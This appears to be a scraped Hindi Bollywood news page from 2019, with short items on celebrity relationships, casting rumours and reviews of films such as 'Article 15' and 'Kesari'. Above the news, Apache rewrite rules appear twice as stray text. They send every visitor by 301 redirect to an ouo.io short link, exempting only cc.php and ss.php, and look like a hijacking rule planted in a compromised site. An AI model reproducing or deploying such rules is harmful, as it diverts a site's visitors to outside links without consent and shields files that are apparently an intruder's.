
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
मलाइका अरोड़ा और अर्जुन कपूर अब अपने प्यार को ओपनली जाहिर करते रहते हैं। दोनों एक दूसरे के साथ फोटो शेयर करते रहते हैं और इतना ही नहीं हाल ही में मलाइका ने प्यार पर एक पोस्ट शेयर करते हुए उसमें अजुर्न कपूर को टैग किया है। मलाइका ने एक इंस्टाग्राम स्टोरी पर एक पोस्ट शेयर किया जिसमें लिखा था, 'राइट लवर्स...सही प्रेमी कभी चिंता का कारण नहीं बनेगा। आप शांति महसूस करेंगे। वे आपके सीने में युद्ध को खत्म कर देंगे और हड्डियों को अमृत से भर देंगे।'इससे पहले अर्जुन ने मलाइका की फोटो अपनी इंस्टाग्राम स्टोरी पर शेयर की थी जिसमें वो अपना चेहरा एक हार्ट शेप का रेड कलर के बैग से छिपाकर बैठी हैं। इस फोटो को शेयर करते हुए अर्जुन ने लिखा, 'वाकई में इसके पास मेरा दिल है।' बता दें कि कुछ समय पहले अर्जुन से उनकी शादी को लेकर सवाल किया गया था तो उन्होंने कहा था, 'मैं किसी को इसके लिए दोषी नहीं ठहराता क्योंकि लोगों को मेरी शादी में काफी दिलचस्पी है।' अर्जुन ने ये भी कहा था, 'मुझे लगता है कि मीडिया सम्मानजनक रही है, उन्होंने मुझे स्पेस दिया। इसलिए, मैं कुछ भी नहीं छिपाऊंगा। अगर मैं शादी करता हूं तो मैं सबको इस बारे में बताऊंगा। मुझे लगता है कि अगर मैं दुनिया से छिपा कर शादी कर लो तो मेरे परिवार को ये बिल्कुल पसंद नहीं आएगा। इसलिए अगर ऐसा कुछ भी होगा, तो मैं इस बारे में जरूर बात करूंगा।'
04 Jul, 2019
आगे पढ़ऐआयुष्मान खुराना की फिल्म 'आर्टिकल 15' शुक्रवार को रिलीज हो गई है। इस फिल्म को लेकर फैन्स में काफी एक्साइटमेंट थी और अब जब कि फिल्म रिलीज हो गई है तो फिल्म देखने से पहले पढ़ें इसका रिव्यू। बिना किसी भेदभाव के हर नागरिक को समता का अधिकार हमारे संविधान में दिया गया एक मूलभूत अधिकार है। इसी के इर्द-गिर्द घूमती है इस फिल्म की कहानी। कहानी अयान रंजन विदेश में पढ़कर अपने पिता के कहने पर आईपीएस ऑफिसर बनता है। उसकी पहली पोस्टिंग होती है उत्तर प्रदेश के एक छोटे से जिले में जहां पर जातिगत भेदभाव होता है। इसी बीच अयान के सामने एक गंभीर अपराध आता है। दरअसल, तीन रुपये ज्यादा दिहाड़ी मजदूरी की मांग करने पर लड़कियों का गैंगरेप कर मार दिया जाता है क्योंकि वो पिछड़ी जाति की होती हैं। आयुष्मान जातियों को लेकर होने वाले भेदभाव के खिलाफ लड़ते हैं और उस बीच क्या-क्या होता है इसके लिए आपको फिल्म देखनी होगी। रिव्यू फिल्म में एक गंभीर सब्जेक्ट को अच्छे से दिखाया गया है। फिल्म को थ्रिलर अंदाज में प्रस्तुत किया है। फिल्म का हर सीन आपको बांधे रखता है। फर्स्ट हाफ थोड़ा लंबा खिंच गया। हालांकि पूरी फिल्म देखने के बाद आप छोटी-छोटी गलतियों को नजरअंदाज करेंगे। फिल्म का सब्जेक्ट जितना मजबूत है, उतने ही मजबूत फिल्म के सीन्स हैं। एक्टिंग आयुष्मान ने सीरियस पुलिस ऑफिसर का किरदार बखूबी निभाया है। उन्होंने एक बार फिर अपनी एक्टिंग से ये साबित कर दिया है कि वो हर किरदार में अपना कमाल दिखा देते हैं। फिल्म की बाकी कास्ट ईशा तलवार, मनोज पाहवा, कुमुद मिश्रा, मोहम्मद जीशान ने भी अच्छा काम किया है। डायरेक्शन इतने सेंसिटिव सब्जेक्ट पर फिल्म बनाना आसान नहीं था, लेकिन अनुभव सिन्हा ने ये कर दिखाया।
04 Jul, 2019
आगे पढ़ऐपिछले काफी समय से टीवी का पॉपुलर कॉमेडी सीरियल 'तारक मेहता का उल्टा चश्मा' अपने 'दया बेन' के किरदार को लेकर सुर्खियों में है। दया बेन का किरदार निभाने वालीं दिशा वकानी काफी समय से शो से गायब हैं और उनकी वापसी को लेकर रोज कोई न कोई नई खबर सामने आती रहती है। फैन्स काफी समय से दया बेन के किरदार को मिस कर रहे हैं। अब दिशा की वापसी पर एक बड़ी खबर सामने आ रही हैं। दरअसल, स्पॉटबॉय की रिपोर्ट के मुताबिक शो के मेकर्स को दिशा वकानी का रिप्लेसमेंट मिल गया है। खबर के मुताबिक दिशा की जगह अब एक्ट्रेस विभूति शर्मा, दया बेन का किरदार निभा सकती हैं। हालांकि शो के मेकर्स और विभूति में से किसी ने भी इस खबर की ऑफिशयल अनाउंसमेंट नहीं की है। बता दें कि विभूति शर्मा इससे पहले सीरियल बड़े अच्छे लगते हैं और हमने ली है शपथ में नजर आ चुकी हैं। आपको बता दें कि इससे पहले खबर थी कि कि मेकर्स ने दयाबेन के रोल के लिए 'पापड़ पोल' फेम एक्ट्रेस अमी त्रिवेदी को अप्रोच किया है, लेकिन जब इस बारे में अमी त्रिवेदी से संपर्क किया गया तो उन्होंने दयाबेन का रोल ऑफर होने की खबरों को गलत बताया। दिशा सितंबर 2017 से शो में नहीं हैं। उन्होंने नवंबर 2017 में बेटी को जन्म दिया था। इसके बाद से उन्होंने शो में वापसी नहीं की है।
04 Jul, 2019
आगे पढ़ऐबॉलीवुड एक्ट्रेस दीपिका पादुकोण ने अपनी आने वाली फिल्म ‘छपाक’ का फर्स्ट लुक शेयर किया है। इस फिल्म में दीपिका पादुकोण एसिड अटैक सर्वाइवर लक्ष्मी अग्रवाल का रोल प्ले कर रही हैं। ये फिल्म राजी फिल्म की डायरेक्टर मेघना गुलजार डायरेक्ट कर रही हैं। दीपिका के इस लुक को देखकर न सिर्फ फैन्स बल्कि बॉलीवुड सेलेब्स भी इस फिल्म को लेकर उत्साहित हो गए हैं। सभी सेलेब्स ने दीपिका के इस लुक की तारीफ की है दीपिका पादुकोण की फिल्म छपाक का पहला लुक काफी प्रभावशाली और रोंगटे खड़े करने वाला है। उनके फिल्म के कैरेक्टर के मुताबिक पहले लुक में उनके चेहरे पर जले के निशान हैं। इस फोटोग्राफ को शेयर करते हुए उन्होंने लिखा कि इस फिल्म की शटिंग आज से शुरू हो गई है। छपाक 10 जनवरी 2020 को रीलिज होगी।
26 Mar, 2019
आगे पढ़ऐफिल्म: केसरी कलाकार: अक्षय कुमार, परिणीति चोपड़ा, राकेश चतुर्वेदी, विक्रम कोचर, सुविंदर विक्की, वंश भारद्वाज, सुरमीत सिंह बेसरा, अश्वत्थ भट्ट, मीर सरवर 12 सितंबर 1897 को तत्कालीन भारत के नॉर्थ-वेस्ट फ्रंटियर प्रांत (अब पाकिस्तान का खैबर पख्तुनवा प्रांत) में हुई ह्यसारागढ़ी की लड़ाईह्ण भारत ही नहीं, विश्व इतिहास की सबसे गौरवपूर्ण गाथाओं में से एक है। सुबह से शाम तक चली इस लड़ाई सिख सैनिकों ने जिस शौर्य का प्रदर्शन किया था, वह अतुलनीय है। सिर्फ इक्कीस सिख सिपाहियों ने दस हजार से ज्यादा अफगानों को तब तक रोके रखा, जब तक कि आखिरी सिपाही नहीं शहीद हो गया। इस लड़ाई में 21 सिख सैनिक और करीब 600 अफगान मारे गए थे। दो दिन बाद ब्रिटिश भारतीय फौज की एक दूसरी टुकड़ी ने अफगानों को खदेड़ कर सारागढ़ी पर फिर से कब्जा कर लिया था। लेकिन क्या विडंबना है कि शौर्य की इस महान गाथा के बारे में अधिकांश भारतीयों को पता नहीं है। इसमें दोष उनका नहीं है। दरअसल, सारागढ़ी में तैनात ब्रिटिश भारतीय सेना के ह्य36 सिख बटालियनह्ण के इस गौरवशाली इतिहास को भारत के आधुनिक इतिहासकारों ने वह महत्व नहीं दिया, जो इसे मिलना चाहिए था। इस लड़ाई में शहीद सभी 21 सिख सैनिकों (नॉन-कमीशंड ऑफिसर) को तब मरणोपरांत भारत के सर्वोच्च वीरता पुरस्कार ह्यइंडियन ऑर्डर ऑफ मेरिटह्ण से सम्मानित किया गया, जो ह्यविक्टोरिया क्रॉसह्ण और अब के ह्यपरमवीर चक्रह्ण के समकक्ष था। अनुराग सिंह निर्देशित अक्षय कुमार की ह्यकेसरीह्ण इस इतिहास के प्रति युवा पीढ़ी में उत्सुकता जगाने का काम कर सकती है। जाहिर है, लोकप्रिय धारा के बड़े फिल्मकार अमूमन किसी भी कहानी को बड़े पर्दे पर पेश करने का साहस तभी लेते हैं, जब उन्हें कहानी में व्यावसायिक संभावनाएं नजर आती हैं। ह्यकेसरीह्ण को बनाने के पीछे भी यह गणित होगा, इसके बावजूद इस फिल्म के निर्माता-निर्देशक बधाई के पात्र हैं कि उन्होंने एक ऐसी घटना को पर्दे पर लाने का फैसला किया, जो एक भारतीय के रूप में हमें गौरवान्वित होने का अवसर देती है। बहरहाल, अब बात फिल्म की। हवलदार ईशर सिंह (अक्षय कुमार) और उसका साथी गुलाब सिंह (विक्रम कोचर) नॉर्थ-वेस्ट फ्रंटियर प्रांत के गुलिस्तान फोर्ट में तैनात है, जो अफगानिस्तान और भारत की सीमा पर स्थित है। इस फोर्ट पर कब्जा करने के लिए समय-समय पर अफगान धावा बोलते रहते हैं, लेकिन हर बार नाकाम हो जाते हैं। एक दिन सीमा पार एक मौलवी (राकेश चतुर्वेदी) के नेतृत्व में कुछ अफगान एक औरत (तोरांज केवोन) को मौत की सजा दे रहे हैं, क्योंकि वह अपने पति को छोड़ कर भागने की कोशिश करती है। ईशर सिंह से यह देखा नहीं जाता है और वह अपने अंग्रेज अफसर के आदेश की अवहेलना करके उस औरत की रक्षा करता है। इस बेअदबी की वजह से उसका ट्रांसफर सारागढ़ी कर दिया जाता है। सारागढ़ी फोर्ट का इस्तेमाल गुलिस्तान फोर्ट और लोकार्ट पोस्ट के बीच संपर्क पोस्ट के रूप में किया जाता है। ईशर सारागढ़ी आकर पोस्ट के इंचार्ज का कार्यभार संभालता है। उधर ईशर के कारनामे से भड़का मौलवी अफगान सरदारों गुल बादशाह खान (अश्वत्थ भट्ट) और खान मसूद (मीर सरवर) को एक साथ मिल कर सारागढ़ी, गुलिस्तान और लोकार्ट फोर्ट पर हमला करने के लिए तैयार कर लेता है। 12 सितंबर 1897 को दस हजार से ज्यादा अफगान सारागढ़ी पहुंच जाते हैं और सिख सैनिकों से सरेंडर करने के लिए कहते हैं। सहायता के लिए सारागढ़ी से लोकार्ट संदेश भेजा जाता है, लेकिन 36 सिख बटालियन को तत्काल सहायता नहीं मिल पाती। फिर ईशर सिंह के नेतृत्व में सिख सिपाही आखिरी दम तक लड़ने का फैसला करते हैं। ईशर सिंह अपनी पुरानी पगड़ी उतार कर केसरी पगड़ी पहन लेता है, क्योंकि केसरी शौर्य का प्रतीक है। फिल्म की स्क्रिप्ट बहुत अच्छी तरह से लिखी गई है। इस पर काफी शोध किया गया है। एक पोस्ट से दूसरे पोस्ट तक संदेश भेजने के लिए जिस पद्धति का इस्तेमाल किया गया है, वह प्रामाणिक लगता है। लेखक गिरीश कोहली और निर्देशक अनुराग सिंह ने हर पात्र को उभरने का पूरा मौका दिया है। किरदारों को अच्छी तरह से गढ़ा गया है। कहानी में शौर्य के साथ भावनाओं को इस तरह बुना गया है कि वह दर्शकों के दिलों में घर कर जाती है। इस फिल्म में हल्के-फुल्के क्षण भी हैं, जो एकरसता को तोड़ते हैं और गुदगुदाते हैं। हालांकि फिल्म में कुछ चीजें अस्वाभाविक भी लगती हैं, पर अखरती नहीं हैं। अक्षय कुमार के कुछ एक्शन दृश्यों में ह्यबॉलीवुडिया शैलीह्ण की छाप साफतौर पर दिखती है। इस फिल्म की एक और खासियत है कि इसमें कहीं भी दो सांप्रदायिक वैमनस्य की बात नहीं की गई है। निर्देशक संतुलित अंदाज में अपनी बात को कहने में सफल रहे हैं। हालांकि इस ऐतिहासिक फिल्म में सिनेमाई छूट ली गई है, फिर भी सारागढ़ी की लड़ाई का चित्रण प्रामाणिक लगता है। गीत-संगीत, सेट, बैकग्राउंड संगीत, संवाद बिल्कुल फिल्म के मिजाज के मुताबिक हैं। बैकग्राउंड में जब गुरुगोविंद सिंह द्वारा रचित ह्यदे वर मोहे शिवा निश्चय कर अपनी जीत करूंह्ण बजता है, तो थियेटर में एक अलग तरह का वातावरण निर्मित हो जाता है। फिल्म की सिनमेटोग्राफी शानदार है। हालांकि फिल्म की लंबाई थोड़ी कम रखी जा सकती थी। निर्देशक अनुराग सिंह पंजाबी फिल्मों का बड़ा नाम हैं। उन्होंने पंजाबी में ह्यपंजाब 1984ह्ण और ह्यजट्ट एंड जूलियटह्ण सिरीज जैसी बड़ी हिट फिल्में निर्देशित की हैं। वह हिन्दी में भी ह्यरकीबह्ण (2007) और ह्यदिल बोले हड़ीप्पाह्ण (2009) जैसी अति साधारण और असफल फिल्में निर्देशित कर चुके हैं। लेकिन वे बतौर निर्देशक ह्यकेसरीह्ण में एक अलग छाप छोड़ते हैं। अक्षय कुमार का अभिनय बेहतरीन हैं। उनका गेटअप भी शानदार है। वे पूरी तरह ईशर सिंह लगते हैं। वैसे गेटअप सारे किरदारों का बढ़िया है। यह अक्षय का अब तक का सबसे बढ़िया अभिनय है। मौलवी के रूप में राकेश चतुर्वेदी का अभिनय भी याद रह जाता है। फिल्म में जितने भी और कलाकार हैं, वह भी अपने किरदारों के साथ न्याय करते हैं। ह्यकेसरीह्ण को देखने के बाद जब हम सिनेमाहॉल से बाहर निकलते हैं, तो जेहन में अनायास ही ये पंक्तियां गूंजने लगती हैं- ह्यसूरा सो पहचानिए, जो लड़े दीन के हेत/ पुर्जा पुर्जा कट मरे कबहुं न छाड़े खेतह्ण। निश्चित रूप से यह फिल्म अपनी बात दर्शकों तक पहुंचाने में कामयाब है। एक कालजयी गाथा पर बनी यह फिल्म सिनेमाई श्रेष्ठता की दृष्टि से भले एक कालजयी फिल्म न हो, लेकिन उत्कृष्ट जरूर है। सिनेमा में अगर आपकी ज्यादा रुचि न हो, तो भी आपको यह फिल्म देखनी चाहिए।
26 Mar, 2019
आगे पढ़ऐकरण जौहर की फिल्म कलंक का एक नया फोटो फिर सामने आया है, जिसमें एक्ट्रेस आलिया भट्ट नजर आ रही हैं। आलिया ने अपनी खूबसूरती से एक बार फिर दर्शेकों का मन जीत लिया है। यह फोटो आलिया ने अपने इंस्टाग्राम पर पोस्ट की है। यह फोटो फिल्म के एक गाने 'घर मोरे परदेसिया' का है। यह गाना आज रिलीज होगा। वहीं फिलहाल फिल्म के पहले गाने को लेकर म्यूजिक कंपोजर प्रीतम ने अपने ट्विटर हैंडल से ट्वीट करके एक बड़ा सीक्रेट रिवील कर दिया है। आपको बता दें कि आलिया भट्ट और वरुण धवन स्टारर फिल्म कलंक 17 अप्रैल को सिनेमाघरों में रिलीज होने जा रही है। फिल्म का टीजर वीडियो रिलीज किया जा चुका है और इसने दर्शकों के दिलों में ट्रेलर के लिए एक्साइटमेंट और बढ़ा दिया है।
26 Mar, 2019
आगे पढ़ऐपिछले कुछ दिनों से श्रद्धा कपूर की शादी की खबरें तेजी से वायरल हो रही है। ऐसा कहा जा रहा था कि श्रद्धा जल्द ही अपने कथित बॉयफ्रेंड रोहन श्रेष्ठा से शादी कर सकती हैं। इन खबरों पर अभी तक श्रद्धा का रिएक्शन तो नहीं आया, लेकिन उनके पिता शक्ति कपूर ने इन खबरों पर अपना रिएक्शन दिया है। शक्ति कपूर ने कहा, 'ये सभी खबरें गलत है। इन खबरों में कोई सच्चाई नहीं है। श्रद्धा अभी 4-5 साल तक शादी के बारे में सोच नहीं सकती क्योंकि उसका पूरा फोकस सिर्फ अपने करियर पर है।' शक्ति कपूर ने आगे कहा, 'पहले भी श्रद्धा का नाम कई एक्टर्स के साथ जुड़ चुका है और उनमें भी कोई सच्चाई नहीं थी। मैं और रोहन के पिता अच्छे दोस्त हैं और उनकी फैमिली के साथ हमारा आना-जाना है।' शक्ति कपूर ने ये भी बताया कि श्रद्धा अपनी सभी पर्सनल बातें उनके साथ डिस्कस करती हैं और वो अपने पेरेंट्स के मर्जी के बिना कभी शादी नहीं करेंगी।श्रद्धा की प्रोफेशनल लाइफ की बात करें तो वो फिलहाल 'स्ट्रीट डांसर' की शूटिंग में बिजी हैं। इस फिल्म में उनके साथ वरुण धवन हैं। इसके साथ ही वो जल्द ही फिल्म 'साहो' में नजर आने वाली हैं। इस फिल्म में उनके साथ सुपरस्टार प्रभास लीड रोल में हैं।
26 Mar, 2019
आगे पढ़ऐ‘अक्टूबर’ की अभिनेत्री बनिता संधू अपनी आगामी तमिल फिल्म ‘वर्मा’ की शूटिंग के लिए सेट पर आने के लिए उत्साहित हैं। ‘वर्मा’ तेलुगू फिल्म ‘अर्जुन रेड्डी’ की तमिल रीमेक है। उनका कहना है कि वे सही फिल्म का इंतजार कर रही थीं। अभिनेता वरुण धवन की मुख्य भूमिका बाली शुजीत सरकार की फिल्म ‘अक्टूबर’ में मुख्य भूमिका निभाने वाली ब्रिटिश अभिनेत्री बनिता ने ‘वर्मा’ में मुख्य अभिनेत्री के किरदार के लिए कोलकाता की मॉडल मेघना का स्थान लिया है। बनिता ने पुष्टि की कि वे ‘वर्मा’ में काम कर रही हैं। उन्होंने कहा, ‘‘हां, मैं ‘वर्मा’ कर रही हूं। और इसके लिए मैं बहुत उत्साहित हूं। ‘अक्टूबर’ से अब तक बहुत अच्छे प्रस्ताव नहीं आ रहे थे।’’ वे एक ऐसी अभिनेत्री की भूमिका निभाने की तैयारी करने के लिए उत्साहित हैं जिससे एक बहुत ज्यादा शराब पीने वाला अभिनेता प्यार करता है। वे कहती हैं कि शूटिंग शुरू होने का और इंतजार नहीं कर सकतीं।
21 Feb, 2019
आगे पढ़ऐ‘दिल्ली-6’ ने बुधवार को अपनी रिलीज के 10 वर्ष पूरे कर लिए हैं। वहीं फिल्म के मुख्य अभिनेता अभिषेक बच्चन का कहना है कि यह दिल, आत्मा से जुडऩे वाली और मार्मिक संदेश वाली फिल्म है। अभिषेक ने बुधवार को इंस्टाग्राम पर यह जानकारी दी, जहां उन्होंने फिल्म के कुछ मोशन पोस्टर साझा किए, जो एक एनआरआई के इर्द-गिर्द घूमती है। वह अपनी दादी के साथ अपनी मातृभूमि लौटता है और दिल्ली के केंद्र में एक विचित्र मंदिर-मस्जिद विवाद में फंस जाता है। फिल्म के 10 वर्ष पूरे हो जाने पर अभिनेता ने ट्वीट किया, ‘‘विश्वास करना मुश्किल है। इस फिल्म की शूटिंग करने में मुझे बेहद मजा आया था। फिल्म के कास्ट और क्रू बेहद सशक्त और मजेदार थे। मेरे पसंदीदा साउंडट्रैक में से एक, जिसे मैं अब भी नियमित रूप से सुनता हूं। दिल और आत्मा से जुड़ी शानदार फिल्म और यह बहुत-ही मार्मिक संदेश देती है। मुझे इस नगीने का हिस्सा बनाने के लिए राकेश ओमप्रकाश मेहरा का शुक्रिया।’’ अभिनेता ने फिल्म के कलाकारों को भी धन्यवाद दिया, इसमें अभिनेत्री सोनम कपूर, ऋषि कपूर, ओम पुरी, वहीदा रहमान, दिव्या दत्ता और अदिति राव हैदरी जैसे सितारे प्रमुख भूमिकाओं में नजर आए थे। उन्होंने कहा, ‘‘उप्स। मैं ‘मसकली’ को धन्यवाद देना भूल गया।’’
21 Feb, 2019
आगे पढ़ऐबॉलीवुड एक्टर आयुष्मान खुराना किरदारों को हटकर चुनाव करने के लिए जाने जाते हैं. उनकी अब तक की सभी फिल्मों में उन्होंने काफी यूनिक किरदार किए हैं और अब वह जल्द ही एक बार फिर कुछ ऐसा ही कारनामा करते पर्दे पर नजर आने वाले हैं. फिल्म अंधाधुन और बधाई हो की शानदार सक्सेस के बाद आयुष्मान फिल्म ड्रीम गर्ल से वापसी करने जा रहे हैं. फिल्म का पोस्टर पहले ही रिलीज हो चुका है. हालांकि फैन्स को इस फिल्म में आयुष्मान के किरदार के बारे में पता नहीं था लेकिन अब ये जानकारी भी सामने आ गई है. खबर है कि फिल्म में आयुष्मान रामलीला की सीता का किरदार निभातेन नजर आएंगे. ड्रीम गर्ल एक कॉमेडी ड्रामा फिल्म होगी और इसके पोस्टर में भी यह साफ तौर पर देखा जा सकता है कि आयुष्मान साड़ी पहने और सिर पर पल्लू लिए नजर आ रहे हैं. फिल्म में आयुष्मान के अलावा नुसरत भरूच अहम किरदार निभाती नजर आएंगी. फिल्म का प्रोडक्शन एकता कपूर और शोभा कपूर कर रही हैं. इसका निर्देशन राज शांडिल्य कर रहे हैं. साल 2018 में आयुष्मान ने 2 बैक टू बैक हिट फिल्में दी थी. बधाई हो और अंधाधुन इन दोनों ही फिल्मों के लिए आयुष्मान को खूब सराहना मिली.
20 Feb, 2019
आगे पढ़ऐ